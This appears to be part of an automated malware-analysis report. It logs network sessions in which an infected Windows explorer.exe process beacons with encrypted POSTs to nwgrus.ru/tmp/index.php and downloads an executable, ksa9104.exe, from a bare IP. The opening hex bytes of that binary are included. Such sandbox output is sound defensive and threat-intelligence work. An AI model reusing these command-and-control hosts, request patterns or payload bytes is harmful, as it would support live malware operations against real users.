                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.44976558.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:20.076170921 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://kaqmpmaijfnk.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 293
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:20.076190948 CEST293OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 48 0b d3 bd
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuH$v|Z/_WJ[gKZ?;@l'.@o]e4~Q+3i1,I<~wglY:Vof ?^~
                                                                      Oct 3, 2024 12:28:21.566986084 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:21 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.44978458.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:29:29.785671949 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://gyvqqphlebcxdpkv.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 351
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:29:29.785707951 CEST351OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 03 a6 80
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu#q-YS|{ u^6*9To`&V_3.$ oDRZ1Wv!|jVR,1@u05Ql|n:~@m2TQ
                                                                      Oct 3, 2024 12:29:31.304580927 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:29:30 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.44978558.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:29:36.320461988 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ljhchdbaaaxer.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 332
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:29:36.320506096 CEST332OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 5c c1 a3
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vuD\EHpmr%M.?k(k47\M*rn6rFA#<q,}^^6%KV]_7MuL>Ucj_iDE=
                                                                      Oct 3, 2024 12:29:38.126115084 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:29:37 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.44978658.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:29:44.101727009 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://gjsnmktycknrotm.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 245
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:29:44.101746082 CEST245OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 08 b9 b8
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu%C~u"7c[KcZM~O1Hf'NndI/asMUBUi3"S&k.5kbTkS!|XHF6
                                                                      Oct 3, 2024 12:29:46.810496092 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:29:46 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.44978758.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:29:53.764369011 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://gtnnfkxyrnmdua.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 312
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:29:53.764405012 CEST312OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 25 e1 a1
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu5%I[mc?{C&h>LNKtc! J$/^!OD-k}GS42.iSc=foD_8cuiZR\-6
                                                                      Oct 3, 2024 12:29:58.317342043 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:29:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.449788109.175.29.39802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:30:10.975163937 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://gjxqibcjarykr.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 133
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:30:10.975222111 CEST133OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 1b fd 8c
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu!PzeuuJ r7V,ruOR!
                                                                      Oct 3, 2024 12:30:12.094862938 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:30:11 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r
                                                                      Oct 3, 2024 12:30:12.095027924 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:30:11 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.449790109.175.29.39802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:30:20.006772995 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://lwriihoulvmts.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 173
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:30:20.006814003 CEST173OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 0d bd 81
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu'wan)P;{gE 1X&W?U+(&9^SG"7^k-B.Q/
                                                                      Oct 3, 2024 12:30:20.785784006 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:30:20 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.449792109.175.29.39802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:30:37.647725105 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://nfjjiuyrybf.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 302
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:30:37.647758007 CEST302OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 32 e9 a7
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vu@2b4Gu{be@\j6%DF>|dVW-MUkg[+0)< Q5FFt6=e_s/nnz"5cY3V&
                                                                      Oct 3, 2024 12:30:38.457832098 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:30:38 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.449794109.175.29.39802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:30:54.839607954 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xtbardaliciv.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 341
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:30:54.839627981 CEST341OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 36 a7 95
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA .[k,vup6` R[z5B&'secp)A)2)I!8a6T==-!}#W}us~:qCtmJV. Abu* #
                                                                      Oct 3, 2024 12:30:55.625368118 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:30:55 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.44976223.145.40.1644432580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-03 10:28:16 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Host: 23.145.40.164
                                                                      2024-10-03 10:28:16 UTC327INHTTP/1.1 200 OK
                                                                      Date: Thu, 03 Oct 2024 10:28:16 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Last-Modified: Thu, 03 Oct 2024 10:00:02 GMT
                                                                      ETag: "62200-6238f9e42717b"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 401920
                                                                      Connection: close
                                                                      Content-Type: application/x-msdos-program
                                                                      2024-10-03 10:28:16 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d3 5f 1a 3c 97 3e 74 6f 97 3e 74 6f 97 3e 74 6f f8 48 ea 6f b7 3e 74 6f f8 48 df 6f be 3e 74 6f f8 48 de 6f eb 3e 74 6f 9e 46 e7 6f 9c 3e 74 6f 97 3e 75 6f 06 3e 74 6f f8 48 db 6f 96 3e 74 6f f8 48 ee 6f 96 3e 74 6f f8 48 e9 6f 96 3e 74 6f 52 69 63 68 97 3e 74 6f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e1 cb 4a 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 12 04
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$_<>to>to>toHo>toHo>toHo>toFo>to>uo>toHo>toHo>toHo>toRich>toPELJe
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: 00 6e 00 6b 00 6e 00 6f 00 77 00 6e 00 3e 00 00 00 00 00 52 00 75 00 6e 00 74 00 69 00 6d 00 65 00 20 00 45 00 72 00 72 00 6f 00 72 00 21 00 0a 00 0a 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 3a 00 20 00 00 00 05 00 00 c0 0b 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 00 00 00 03 00 00 00 09 00 00 00 90 00 00 00 0c 00 00 00 00 00 00 00 d3 7b 43 00 14 0c 43 00 dd 79 43 00 c9 29 43 00 62 61 64 20
                                                                      Data Ascii: nknown>Runtime Error!Program: {CCyC)Cbad
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: 13 8b 6e 1e 75 35 3e 00 00 00 00 00 60 1e 40 00 00 00 8c d9 0b f7 3f fd b2 d4 60 86 2c 2b 3e 00 00 00 00 00 80 1e 40 00 00 00 64 01 0e f7 3f 9a b4 e5 0b 05 c6 35 3e 00 00 00 00 00 a0 1e 40 00 00 00 d4 24 10 f7 3f 6c 01 b1 d6 19 20 20 3e 00 00 00 00 00 c0 1e 40 00 00 00 e4 43 12 f7 3f 7e 7f 2b 5e 97 88 4d 3e 00 00 00 00 00 e0 1e 40 00 00 00 ac 5e 14 f7 3f d1 50 4b c0 51 44 00 3e 00 00 00 00 00 00 1f 40 00 00 00 2c 75 16 f7 3f 5e 7b e8 0f 23 74 46 3e 00 00 00 00 00 20 1f 40 00 00 00 7c 87 18 f7 3f e3 5e 34 4b d1 cb 20 3e 00 00 00 00 00 40 1f 40 00 00 00 a0 95 1a f7 3f 85 ee 34 a2 4f 0a 3e 3e 00 00 00 00 00 60 1f 40 00 00 00 a8 9f 1c f7 3f 58 45 da 93 a5 20 4a 3e 00 00 00 00 00 80 1f 40 00 00 00 a4 a5 1e f7 3f 28 c7 67 d4 b9 d1 2c 3e 00 00 00 00 00 a0 1f 40
                                                                      Data Ascii: nu5>`@?`,+>@d?5>@$?l >@C?~+^M>@^?PKQD>@,u?^{#tF> @|?^4K >@@?4O>>`@?XE J>@?(g,>@
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: 0d 67 fd b3 81 1b 88 9b 65 ca 1f 30 5e 8b 7a f4 e1 ca 28 27 24 b7 40 58 a9 05 8d f8 55 f7 a1 c4 17 cf 96 b7 44 63 e4 bb 5f d0 a1 98 1d a7 20 7a ed be 80 3c 54 2f 3a a0 8b c0 fc d2 77 1e 16 85 fc d6 13 8c 9a 18 fb dd 85 ad a8 68 6f 7d 32 63 a7 ab c6 1d a2 bd bf e7 27 44 ee b5 82 92 a8 a0 b8 da 1c f1 ed 2f 25 4b bd 58 16 45 80 fe 63 22 5c 15 81 ab bb c1 8c db 26 27 b8 82 1a bb 6c 06 2c a2 bb da 9b 47 54 d3 09 d5 77 63 ed de a5 35 c9 18 c3 6f 26 02 ce 95 97 71 80 42 39 59 52 3f b7 6f e3 82 5c a4 68 0e 65 aa a1 8e 96 36 e3 ae 57 20 92 9c a9 9b 56 85 92 76 4c a7 36 c3 e7 36 9c 32 4f b4 9a 93 e9 94 f2 b4 96 bb f5 38 b7 34 ae 2a 91 ac a0 56 ae 5f d5 e8 cb bb b5 6d 43 b2 b5 ed 30 ac 5c 48 8e c0 81 3f 86 79 d6 47 d5 f6 1a 8f 10 9f 15 d7 85 1f 74 cb ec df fa dc 56
                                                                      Data Ascii: ge0^z('$@XUDc_ z<T/:who}2c'D/%KXEc"\&'l,GTwc5o&qB9YR?o\he6W VvL662O84*V_mC0\H?yGtV
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: 04 c9 5e 19 7e a9 52 3e bd b2 b0 38 57 49 11 b7 f9 66 d7 ea 9d 19 77 80 f3 b8 32 78 f2 35 fc 65 32 ab bc 07 87 b2 35 ff 42 ca f6 d4 d6 f7 58 88 7d 5b 9a ec 68 c3 e9 87 e8 cd a9 a6 bc ca e6 bf c1 6f 09 61 30 54 cb b3 ac 2b 5f 75 c7 2e 24 7a 64 e3 fa bb 5c 59 63 a0 0c a4 58 5d 9b ef 9a 30 3a 6a 51 0c c4 5b 4c 2b 37 d1 06 ee 50 61 5c c8 5e 57 88 e6 e7 fa 9c f7 6a b5 c3 c7 f5 b8 4a e7 30 71 c8 b6 68 79 39 f1 75 5b 2d ba f1 14 90 28 79 7a 97 78 c1 5c 44 15 01 1f 7a f5 70 cc bf b6 83 f8 00 63 0b 4d 5a ff 7f 59 61 df a4 db 7c 1d 4a 6b d8 fa 7c 80 7d 56 9c f1 4b 38 c5 67 19 c4 04 d5 6c e2 90 08 31 de b5 f6 23 92 ba 79 8f 81 c5 0f 52 a1 28 eb 50 88 d2 98 f8 22 8b e3 b2 76 ae 35 58 93 2e fb 36 c6 17 f0 53 cf 93 be 08 d2 97 ab 82 b6 c1 8e 26 c8 92 c2 17 f7 c6 a7 42
                                                                      Data Ascii: ^~R>8WIfw2x5e25BX}[hoa0T+_u.$zd\YcX]0:jQ[L+7Pa\^WjJ0qhy9u[-(yzx\DzpcMZYa|Jk|}VK8gl1#yR(P"v5X.6S&B
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: db 02 15 ff 46 07 e0 f5 17 99 45 32 ff 33 0e 54 c8 86 84 e5 5a 8a 7b df 3b 58 84 e7 dd 82 72 6f 7d 70 5b 31 b6 5a 93 b4 94 15 e0 e2 28 43 25 60 a5 5b 18 5d d4 d7 94 15 40 93 d0 02 66 e9 67 9c d2 70 af 18 5a 52 bf df 9f d3 9a 42 70 d7 41 c9 31 aa 12 3a 1c 75 03 49 a6 6c be 90 71 af 36 da ef fe 48 28 96 fe 87 7a 2d d8 96 48 3d ff ec b1 51 e3 ee 81 45 53 ad 9f cf e9 72 b0 fa 52 f9 73 ca f9 dc b1 8b ca b6 44 b8 c5 36 ea 15 26 9a c4 35 cb 4c 4f 20 57 b5 71 84 52 70 65 09 f7 09 2c 56 63 1d 08 29 2d 29 bf d1 d3 79 32 79 7e b2 6d cb a9 cf 14 7a ac 6e 7f 1c 46 ba 74 8d d9 e8 dd f4 37 d6 06 bb e0 8a 90 17 ab 18 b9 37 9a cb aa 98 5e 03 c9 0d 28 0b fd 6c 8c 8b 07 26 0d 08 71 e2 5f 23 24 34 c0 59 87 a8 e3 bd 6a 20 e7 20 95 5c 71 e1 8e 18 0c 0a 8d 04 d7 90 ae 5c f3 29
                                                                      Data Ascii: FE23TZ{;Xro}p[1Z(C%`[]@fgpZRBpA1:uIlq6H(z-H=QESrRsD6&5LO WqRpe,Vc)-)y2y~mznFt77^(l&q_#$4Yj \q\)
                                                                      2024-10-03 10:28:16 UTC8000INData Raw: 7c 71 24 72 27 77 c2 21 c1 04 b9 33 b7 d5 c5 52 e1 94 b7 90 09 5a 6e d0 aa 24 a3 68 3c 1d d0 96 b8 8a 17 ad 07 f7 b6 04 a6 7a e0 e2 49 bd dd 92 81 5e 9f 2a 09 19 45 ef c9 f4 5d b4 c7 ef 07 a7 22 a1 29 3b 2c 00 42 eb 43 0b 29 e6 01 db 7e af cc ad f7 c2 03 8e 31 8d 2f 54 77 7d 1b 00 5d bc 90 88 31 7d af a0 0e 89 89 c8 fa 73 79 d9 c5 cd 99 5e 01 c5 65 96 5d 3a fe dc 4e 0b 20 ae ef aa 6f 30 7d f5 18 bd 98 b8 b6 38 51 02 34 06 6a 67 15 d7 84 a2 f3 a7 1d 44 cf f2 c9 f0 b9 d1 b0 af 13 77 6b 33 27 b6 e3 8c 65 88 0e 6d 4c 6d ad 77 b1 f9 55 59 09 cc 6e 3c 84 f1 02 be a8 df ba c5 22 bb fa 4c 2f 58 a7 64 6b 63 ea de 0b 76 c0 13 70 24 da cd 6d 79 c1 03 a1 09 01 77 8e ac 35 a7 10 2e 7f 48 0e 8f 4f 6e bc e1 79 58 8d 63 e4 d6 da 19 8b 04 f9 56 eb 46 da 55 e5 7a 23 65 d6
                                                                      Data Ascii: |q$r'w!3RZn$h<zI^*E]");,BC)~1/Tw}]1}sy^e]:N o0}8Q4jgDwk3'emLmwUYn<"L/Xdkcvp$myw5.HOnyXcVFUz#e
